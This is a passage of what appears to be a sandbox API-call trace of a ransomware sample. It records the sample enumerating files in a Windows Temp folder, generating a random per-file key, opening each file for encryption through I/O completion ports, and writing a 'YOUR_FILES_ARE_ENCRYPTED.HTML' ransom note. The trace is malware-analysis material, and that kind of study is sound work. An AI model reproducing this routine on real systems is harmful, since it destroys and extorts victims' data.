ftCreationTime.dwHighDateTime=0x1d7dc83, ftLastAccessTime.dwLowDateTime=0x93e8e3e0, ftLastAccessTime.dwHighDateTime=0x1d7e230, ftLastWriteTime.dwLowDateTime=0x93e8e3e0, ftLastWriteTime.dwHighDateTime=0x1d7e230, nFileSizeHigh=0x0, nFileSizeLow=0x1671a, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="vuZUNZYfHxr7qOv1nIea.wav", cAlternateFileName="VUZUNZ~1.WAV")) returned 1 [0164.285] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav") returned 67 [0164.285] lstrcmpW (lpString1="vuZUNZYfHxr7qOv1nIea.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.285] PathFindExtensionW (pszPath="vuZUNZYfHxr7qOv1nIea.wav") returned=".wav" [0164.285] lstrlenW (lpString=".wav") returned 4 [0164.285] PathFindExtensionW (pszPath="vuZUNZYfHxr7qOv1nIea.wav") returned=".wav" [0164.285] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\vuzunzyfhxr7qov1niea.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d0 [0164.285] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91930) returned 1 [0164.285] GetProcessHeap () returned 0x270000 [0164.285] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e0860 [0164.289] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="DC") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="5E") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="D7") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="2F") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="00") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="76") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="7E") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="23") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="90") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CC") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="18") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="5B") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="22") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="46") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="EC") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="4A") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E6") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D0") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="06") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="1C") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="8E") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="F7") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B5") returned 2 [0164.289] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="E2") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="30") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="82") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AD") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="8E") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="67") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B9") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="5B") returned 2 [0164.290] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="71") returned 2 [0164.290] lstrcpyW (in: lpString1=0x76f0914, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav" [0164.290] CreateIoCompletionPort (FileHandle=0x5d0, ExistingCompletionPort=0x3a0, CompletionKey=0x76e0860, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.290] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e0860, lpOverlapped=0x76e0860) returned 1 [0164.290] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeed4c470, ftCreationTime.dwHighDateTime=0x1d7d963, ftLastAccessTime.dwLowDateTime=0x8f22abc0, ftLastAccessTime.dwHighDateTime=0x1d7d989, ftLastWriteTime.dwLowDateTime=0x8f22abc0, ftLastWriteTime.dwHighDateTime=0x1d7d989, nFileSizeHigh=0x0, nFileSizeLow=0x27ab, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="W4Xv9jzg2KbFjS-q_dpx.ppt", cAlternateFileName="W4XV9J~1.PPT")) returned 1 [0164.290] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt") returned 67 [0164.290] lstrcmpW (lpString1="W4Xv9jzg2KbFjS-q_dpx.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.291] PathFindExtensionW (pszPath="W4Xv9jzg2KbFjS-q_dpx.ppt") returned=".ppt" [0164.291] lstrlenW (lpString=".ppt") returned 4 [0164.291] PathFindExtensionW (pszPath="W4Xv9jzg2KbFjS-q_dpx.ppt") returned=".ppt" [0164.291] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\w4xv9jzg2kbfjs-q_dpx.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d4 [0164.291] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=10155) returned 1 [0164.291] GetProcessHeap () returned 0x270000 [0164.291] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77089b8 [0164.295] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="6C") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0E") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="35") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="63") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="7C") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="FC") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="71") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E8") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="00") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="77") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="06") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="57") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="D0") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E6") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="DD") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="DE") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="80") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FF") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="22") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="61") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="42") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="B9") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="A6") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="5E") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="57") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="5B") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="00") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="97") returned 2 [0164.295] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="CC") returned 2 [0164.296] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B3") returned 2 [0164.296] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="99") returned 2 [0164.296] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="72") returned 2 [0164.296] lstrcpyW (in: lpString1=0x7718a6c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt" [0164.296] CreateIoCompletionPort (FileHandle=0x5d4, ExistingCompletionPort=0x3a0, CompletionKey=0x77089b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.296] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77089b8, lpOverlapped=0x77089b8) returned 1 [0164.296] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0164.296] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE") returned 49 [0164.296] GetProcessHeap () returned 0x270000 [0164.296] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0164.296] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE" [0164.297] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\*" [0164.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfeda55, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.302] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfeda55, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0164.302] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82f37860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0x82f37860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x82f37860, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfeda55, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0164.302] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.303] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0164.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\WPDNSE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\wpdnse\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0164.303] WriteFile (in: hFile=0x5d8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.305] CloseHandle (hObject=0x5d8) returned 1 [0164.305] GetProcessHeap () returned 0x270000 [0164.307] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.307] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2bd7d20, ftCreationTime.dwHighDateTime=0x1d7e46f, ftLastAccessTime.dwLowDateTime=0xa8b43a30, ftLastAccessTime.dwHighDateTime=0x1d7e61e, ftLastWriteTime.dwLowDateTime=0xa8b43a30, ftLastWriteTime.dwHighDateTime=0x1d7e61e, nFileSizeHigh=0x0, nFileSizeLow=0x7d4b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="y S-BBqSytXN.png", cAlternateFileName="YS-BBQ~1.PNG")) returned 1 [0164.307] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png") returned 59 [0164.307] lstrcmpW (lpString1="y S-BBqSytXN.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.307] PathFindExtensionW (pszPath="y S-BBqSytXN.png") returned=".png" [0164.307] lstrlenW (lpString=".png") returned 4 [0164.307] PathFindExtensionW (pszPath="y S-BBqSytXN.png") returned=".png" [0164.307] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\y s-bbqsytxn.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0164.307] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=32075) returned 1 [0164.307] GetProcessHeap () returned 0x270000 [0164.307] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7730b10 [0164.311] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="64") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="91") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="94") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="44") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="73") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="5C") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="12") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="7E") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="82") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="56") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="79") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="C3") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B8") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E8") returned 2 [0164.311] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="F2") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CE") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="6B") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="DE") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="C8") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="1E") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="65") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="86") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="88") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9C") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7B") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B3") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="91") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="FE") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7D") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="EB") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="17") returned 2 [0164.312] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4E") returned 2 [0164.313] lstrcpyW (in: lpString1=0x7740bc4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png" [0164.313] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x7730b10, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.313] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7730b10, lpOverlapped=0x7730b10) returned 1 [0164.313] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42eae1d0, ftCreationTime.dwHighDateTime=0x1d7d98b, ftLastAccessTime.dwLowDateTime=0xacc743a0, ftLastAccessTime.dwHighDateTime=0x1d7e1fb, ftLastWriteTime.dwLowDateTime=0xacc743a0, ftLastWriteTime.dwHighDateTime=0x1d7e1fb, nFileSizeHigh=0x0, nFileSizeLow=0x13180, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="yhTUsRbK USBCZS0QQpK.wav", cAlternateFileName="YHTUSR~1.WAV")) returned 1 [0164.313] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav") returned 67 [0164.313] lstrcmpW (lpString1="yhTUsRbK USBCZS0QQpK.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.313] PathFindExtensionW (pszPath="yhTUsRbK USBCZS0QQpK.wav") returned=".wav" [0164.313] lstrlenW (lpString=".wav") returned 4 [0164.313] PathFindExtensionW (pszPath="yhTUsRbK USBCZS0QQpK.wav") returned=".wav" [0164.313] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\yhtusrbk usbczs0qqpk.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0164.313] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=78208) returned 1 [0164.314] GetProcessHeap () returned 0x270000 [0164.314] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7758c68 [0164.317] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="6E") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="C0") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="B4") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="96") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EF") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="26") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="B1") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A0") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="50") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="F1") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="2B") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="4E") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E6") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="2F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="87") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B1") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="7A") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="63") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="02") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="74") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="AC") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AB") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="7F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0E") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="58") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="9F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="3A") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AA") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="3F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="84") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="05") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="5C") returned 2 [0164.319] lstrcpyW (in: lpString1=0x7768d1c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav" [0164.319] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x7758c68, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.319] PostQueuedCompletionStatus (CompletionPort=0x3a0, 